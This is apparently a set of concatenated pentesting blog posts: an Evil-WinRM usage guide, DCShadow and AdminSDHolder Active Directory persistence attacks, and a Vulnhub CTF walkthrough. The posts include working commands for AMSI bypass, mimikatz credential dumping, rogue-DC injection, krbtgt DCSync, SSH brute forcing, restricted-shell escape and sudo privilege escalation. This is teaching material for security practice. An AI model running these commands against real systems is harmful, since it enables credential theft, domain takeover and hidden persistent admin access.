Evil-Winrm : Winrm Pentesting Framework

In this post we will discuss the most famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is an opensource tool which is available on GitHub for winrm penetration testing.

Table of Content

·         Evil-winrm

·         Features

·         Installation

·         Load PowerShell scripts

·         Pass the Hash

·         Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.

Features

§  Compatible to Linux and Windows client systems

§  Load in memory Powershell scripts

§  Load in memory dll files bypassing some AVs

§  Load in memory C# (C Sharp) assemblies bypassing some AVs

§  Load x64 payloads generated with awesome donut technique

§  AMSI Bypass

§  Pass-the-hash support

§  Kerberos auth support

§  SSL and certificates support

§  Upload and download files showing progress bar

§  List remote machine services without privileges

§  Command History

§  WinRM command completion

§  Local files completion

§  Colorization on prompt and output messages (can be disabled optionally)

§  Docker support (prebuilt images available at Dockerhub)

§  Trap capturing to avoid accidental shell exit on Ctrl+C

Installation

In post, we have discussed two easy method to install winrm in your kali Linux, you will find more method for installation from GitHub.

With the help of Ruby gem, you can direct install the evil-winrm, it will automatically install all dependency in your machine by executing following command.

gem install evil-winrm

once it will get installed you can pull its HELP option by typing ‘evil-winrm’ that will display the syntax and other operators for executing evil-winrm against windows remote management service.

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. As result, it will give the access of victim shell by providing its Powershell as given below.

Syntax: evil-winrm -i -u -p <’password’>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

It will not only provide shell of the host machine but also provide menu to load function such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pen testing powershell script in the /root/powershell and we can upload these ps1 script through evil winrm on the host machine.

The .PS1 scripts must be in the path set at -s argument and execute this as given below:

Syntax: evil-winrm -i -u -p <’password’> -s

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell

Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have tried to upload mimikatz PowerShell script to dump stored credential.

menu

Bypass 4MSI

Invoke-Mimikatz.ps1

Invoke-Mimikatz

As result, it has dumped all the credential of the Windows Server. 😈

Pass the Hash

It has one more feature which allow you to conduct Pass the HASH attack and as result it give the shell of the host machine.

Install using its Docker image

This is very easy and convenient method to install winrm on your attacking machine and simultaneously provide the shell of the victim machine by compromising it winrm service. Only you need to execute following command.

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Domain Persistence: DC Shadow Attack

In this post we are going to discuss the most dynamic attack on AD named as DC Shadow attack. It is part of Persistence which create rogue Domain controller in network. This attack is an actual threat because of This attack leverage into another dynamic attack such as  DCSync Attack and Golden ticket Attack.

DCShadow Attack

Dcshadow is feature in mimikatz that manipulating Active Directory (AD) data, including objects and schemas, by registering and replicating the behavior of a Domain Controller (DC). It simulates the behavior of a Domain Controller (using protocols like RPC used only by DC) to inject its own data, bypassing most of the common security controls and including your SIEM. It shares some similarities with the DCSync attack (already present in the lsadump module of mimikatz)

It is a post exploitation attack (also called domination attack) because it requires domain admin (or enterprise admin) privileges

Description of the attack

The attacks is done using the following steps:

• registering the "DC" by creating 2 objects in the CN=Configuration partition and altering the SPN of the computer used.
• Pushing the data (triggered using DrsReplicaAdd, KCC or other internal AD events)
• Removing the object previously created to demote the DC

WALKTHROUGH

Using the compromised user account we identify the identify of loggon user “Yashika” and notice it is member of Domain User group.

To perform the DC SHADOW attack, you need to download and install mimikatz inside the host machine and run it as administrator in order to execute “!+” and “!processtoken” command. This will register and start mimidrv service and try to elevate for privilege token thus it provides privilege to call kernel level functions via a user mode application.

!+

!processtoken

token::whoami

Thus with the help of “token::whoami” we can enumerate the current identity. As you can observe that it has shown “NT Authority/System” privilege.

Now execute following command which will mimic as bogus domain controller in the network and try to add user Yashika in the domain admin group.

lsadump::dcshadow /object:yashika /attribute:primaryGroupID /value:512

Open one more mimiktaz in a new terminal and execute the following command which will try to push bogus domain controller into legitimate.

lsadump::dcshadow /push

So, after executing above mentioned command, we checked identity for user yashika again and noticed that this time it becomes the member of domain admin group.

net user yashika /Domain

Why DCshadow is dynamic attack, because if you have added the user into PrimaryGroupID object then it will be not easy for administrator to remove the any user from inside domain admin group.

This attack also becomes ladder for carrying out other attacks like the DCsync attack. As we discussed earlier, if a host is a member of a privilege group such as a domain administrator or enterprise, an intruder can imitate as a domain controller with dcsync attacks and can request user NTLM hashes from other domain controllers on the network, read more about it from here.

lsadump::dcsync /domain:ignite.local /user:krbtgt

Once the intruder is able to get hashes of KDC server, further he can carry out the Golden Ticket attack which read from here, therefore the we called DC Shadow is most dynamic attack on AD.

Reference: https://www.dcshadow.com/

Domain Persistence AdminSDHolder

In this post we will discuss Peristence attack on Active Directory by abusing AdminSDHolder. This attack is actual threat because This attack leverage into other dynamic attack such as  DCSync Attack and Golden ticket Attack.

AdminSDHolder

Active Directory Domain Services uses AdminSDHolder, protected groups and Security Descriptor propagator (SD propagator or SDPROP for short) to secure privileged users and groups from unintentional modification. Unlike most objects in the Active Directory domain, which are owned by the Administrators group, AdminSDHolder is owned by the Domain Admins group.

The AdminSDHolder object has a unique Access Control List (ACL), which is used to control the permissions of security principals that are members of built-in privileged Active Directory groups.  Every hour, a background process runs on the domain controller to campare manual modifications to an ACL and overwrites them so that the ACL matches the ACL on the AdminSDHolder object.

Read from here for more detail.

AdminSDHolder Persistence Attack

On compromised domain controller with administrator privilege the attacker is capable to create a permanent backdoor for his future attack by abusing AdminSDHolder. With help of this attack we will bel able to alters AdminSDHolder by adding a new user to its Access Control List.

Here we will try to add user Yashika into ACL of AdminSDHolder object in order to change privilege for user yashika. Current User yashika is a domain user as shown below.

Follow the step to learn how an attacker can conduct AdminSDHolder attack.

1.       Navigate to Active Director User aand Computers

2.       Explore Menu > View> Advanced Features

3.       Explore System > AdminSDHolder > Properties

4.       Add user to whom you want to give Full Permission. Here I have choose user: “Yashika”

5.       Give Full Permission by enabling All check box.

As we mention background process runs, by default, every sixty (60) minutes but default frequency for running Security Descriptor Propagator process could be changed by creating a REG_DWORD registry entry and setting the new frequency value.

This can be done on compromised DC by executing the following command inside command prompt which will reset Security Descriptor Propagator process for 3 minutes (300 as decimal & 12c as hexadecimal)

REG ADD HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /V AdminSDProtectFrequency /T REG_DWORD /F /D 300

To ensure the fruitful result of above command, explore the following path : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters

After three minutes we checked identify for user “yashika” using net user command and notice Yashika has become the member of domain admin group.

net user yashika /Domain

Even if the administrator try to remove yashika form domain admin group then after 3 minute due to Security Descriptor Propagator process it will again add Yashika into Domain Admin Group.

Seppuku:1 Vulnhub Walkthrough

Today we are going to crack this machine called “Seppuku:1”. It is available on Vulnhub for the purpose of Penetration Testing practices. It was an intermediate box which made me learn many new things. This credit of making this lab goes to SunCSR Team. Let’s start and learn how to successfully breach it.

Level:  Intermediate to Hard
Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this here .

Penetration Testing Methodology

Reconnaissance

·         Netdiscover

·         Nmap

Enumeration

·         Abusing HTTP Services

·         Dirb

Exploiting

·         Brute forcing using hydra

·         Connecting using SSH

·         Bypassing Restricted shell

Privilege Escalation

·         Abusing Sudo

·         Capture the flag

 

Walkthrough

Reconnaissance

As you know, this is the initial phase where we choose netdiscover for network scan for identifying host IP and this we have 192.168.1.104 as our host IP.

Then we used nmap for port enumeration. We found that port 21 for ftp, port 22 for ssh, port 80 for http, 139 and 445 for netbios-ssn, port 7080 for ssl/http, port 7601 for http, port 8088 for http.

nmap -p- -A 192.168.1.104

Enumeration

For more detail, we will be needing to start enumeration against the host machine. Since port 7601 is open I look toward browser and explore target ip 192.168.1.104  but unfortunately found nothing useful.

http://192.168.1.104:7601

Further, we use dirb for directory brute-forcing and found secret & key with status code 200 OK on executing following command.

dirb http://192.168.1.104:7601

When we navigate URL enumerated above, i.e. keys we found some files, here private was useful for us.

http://192.168.1.104:7601/keys

This link leads us to a page called private. This is a private key for some user which we have not found yet.

Further we will explore our next directory called secret which we found in our dirb scan.

http://192.168.1.104:7601/secret

AS result it give some very important files such as password.lst and hostname.

Here found a file named hostname which gave us a username i.e. seppuku.

Exploiting

We have got a username seppuku , now our next job is to find password for the user seppuku with the help of hydra for SSH login brute force. Here the best way to guess password is to use the password file which we found in secret directory during dirb scan.

hydra -l seppuku -P /root/Desktop/password.lst 192.168.1.104 ssh

From its result, we found the password eeyoree for seppuku.

We have a username and password, so we tried to access the SSH on the target system and we were successfully able to log in.

ssh seppuku@192.168.1.104

 After getting logged in let’s go for further investigation to find some hidden files. As a result, we found a hidden file called .passwd which gave us a password for what we don’t know right now.

After that we tried to go inside home directory, but we were not able to do so because of restricted rbash shell. 🤔

ls -la

cat .passwd

cd /home

Since we know the ssh credentials of the user who is part of rbash shell , then you can use the following command along ssh to break the jail and bypass the rbash by accessing proper bash shell.

ssh seppuku@192.168.1.104 -t “bash –noprofile”

Now we will again try to access home directory this time we were successful in doing so. Now we will again check the hidden files where we found 2 new users named samurai and tanto.

So let’s dive in by getting logged in as samurai with password we found in .passwd hidden file.

cd /home

su samurai

Let us use the sudo -l command to enumerate if this user can run some application with root privileges.

sudo -l

 We found seppuku user can run .cgi_bin/bin command as the samurai user which suppose have the root access.

Privilege Escalation

If you remembered we have enumerated private key when while performing directory brute force, here I copied the content of private file found in key during dirb scan and saved it into an empty file named sshkey with chmod 600 permissions.

chmod 600 sshkey

Since we port 22 open on target machine, we will try to connect the target machine using this key for user TANTO and execute following command.

ssh -i sshkey tanto@192.168.1.104 -t “bash –noprofile”

ls -la

After login as tanto we looked for .cgi_bin directory that will be executed through sudo user but unfortunately, I was unable to find this directory therefore I made a directory as .cgi_bin and save the bash script in a file named as “bin” to get bash shell through it.

mkdir .cgi_bin

cd .cgi_bin/

echo “/bin/bash” > bin

chmod 777 bin

ls -la

Now it was time to exploit .cgi_bin program, thus again we logged as Samurai and run the following command and obtain the root shell and finished the challenge by capturing the root flag 🚩. 

sudo ../../../../../../../home/tanto/.cgi_bin/bin /tmp/*

cd /root

ls

cat root.txt